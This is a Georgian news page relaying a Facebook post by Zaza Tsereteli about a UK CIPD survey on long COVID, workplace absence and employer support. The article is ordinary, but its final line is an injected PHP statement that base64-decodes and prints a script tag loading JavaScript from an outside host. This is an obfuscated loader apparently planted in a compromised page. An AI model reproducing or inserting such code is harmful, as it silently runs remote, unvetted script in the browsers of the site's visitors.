celsiusi
ავერსი შნაიდერი
ნორვეგიის სამეფოს ჯანდაცვის სამინისტროს ქართველი მრჩეველი მიმართავს ადამიანებს, ვინც არასერიოზულად უყურებს კოვიდ დაინფიცირებას, ვაქცინაციას და ჰგონია, რომ ეს უბრალო გრიპია და მისი გადატანა, აცრების გარეშე უკეთესიც კი არის. 
 
ზაზა წერეთლის Facebook-პოსტს  უცვლელად გთავაზობთ:
 
"პერსონალისა და განვითარების ინსტიტუტმა (The Chartered Institute of Personnel and Development CIPD - გაერთიანებული სამეფო) დაადგინა, რომ გაერთიანებული სამეფოს დამსაქმებელთა 26% ამბობს, რომ მათ თანამშრომლებს შორის სამსახურის გაცდენის ერთ-ერთი მთავარი მიზეზი ხანგრძლივი კოვიდია. 
 
804 ორგანიზაციის გამოკითხვამ, რომლებიც წარმოადგენენ 4,3 მილიონზე მეტ თანამშრომელს, აჩვენა, რომ ხანგრძლივ კოვიდს გრძელვადიანი არყოფნის სამ მთავარ მიზეზს შორის ყოველი მეოთხე ადამიანი ასახელებს. გამოკითხვამ ასევე აჩვენა, რომ ორგანიზაციების ნახევარს ჰყავდა პერსონალი, რომლებიც დაზარალდნენ ხანგრძლივი Covid-ით ბოლო 12 თვის განმავლობაში.
 
კვლევამ ასევე აჩვენა, რომ დამსაქმებელთა მეხუთედმა არ იცოდა, ჰქონდა თუ არა მათთან მომუშავე პერსონალს მუდმივი სიმპტომები COVID ინფექციის შემდეგაც. მხოლოდ 19% აწვდიდა თანამშრომლებს მითითებებს სამსახურში მუშაობის დროს ჯანმრთელობის მდგომარეობის მართვის შესახებ.
 
გამოკითხვა ეყრდნობა მზარდ მტკიცებულებას, რომ ჯანმრთელობის გრძელვადიანი პრობლემები ემატება არსებულ პრობლემებს, რომელიც ახასიათებს გაერთიანებული სამეფოს გამოფიტულ სამუშაო ძალას. ოფიციალური მონაცემები აჩვენებს, რომ ადამიანების რიცხვი, რომლებიც არ მუშაობენ, ან არ ეძებენ სამუშაოს ხანგრძლივი ავადმყოფობის გამო, 230,000-ით გაიზარდა პანდემიამდელ დონესთან შედარებით.
 
გაურკვეველია, ამ ჯგუფიდან რამდენს აქვს პრობლემები, რომლებიც დაკავშირებულია ხანგრძლივ Covid-თან და რამდენია დაავადებული ფსიქიკური ჯანმრთელობის ან სხვა ქრონიკული დაავადებებით. მაგრამ ეროვნული სტატისტიკის ოფისის მონაცემები აჩვენებს, რომ 1.3 მილიონი ადამიანი აფიქსირებდა Covid-ის მუდმივ სიმპტომებს 2022 წლის დასაწყისში და რომ მათგან თითქმის მეოთხედი მილიონი ამბობდა, რომ მათი ყოველდღიური აქტივობების შესრულების უნარი "ბევრად შეზღუდულია".
 
მდგომარეობა - რომლის სიმპტომები მერყეობს დაღლილობიდან, ტვინის დანისვლიდან თუ მოკლევადიანი მეხსიერების დაქვეითებიდან, სუნთქვის გაძნელებამდე და გულისცემის ან არტერიული წნევის ცვლილებებამდე - უფრო გავრცელებულია ჯანდაცვისა და მოვლის მუშაკებსა და მასწავლებლებს შორის, რომელთა დაინფიცირება ვირუსის ადრეულ სტადიაზე მოხვდა და ვაქცინაციაც იმ პერიოდში ჯერ არ იყო დაწყებული.
 
კვლევამ აჩვენა, რომ დაავადებულთა მეხუთედმა მაინც ვერ შეძლო სამსახურში დაბრუნება, მათგან ბევრი ვინც დაბრუნდა, მოითხოვა მუშაობა შემცირებული საათებით.
 
CIPD-ში განაცხადეს, რომ ამ კვლევამ ხაზი გაუსვა „გადაუდებელ აუცილებლობას მნიშვნელოვანი და სისტემური ცვლილებისთვის, რათა ასეთი ჯანმრთელობის მდგომარეობის ადამიანებს, დაეხმარონ სამსახურში დარჩენაში. ხანგრძლივი COVID რჩება საკითხად, რომლის შესახებაც დამსაქმებლებმა უნდა იცოდნენ და მათ უნდა გადადგან შესაბამისი ნაბიჯები ამ მდგომარეობის მქონე თანამშრომლების მხარდასაჭერად”, - წერს ზაზა წერეთელი.
1006
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");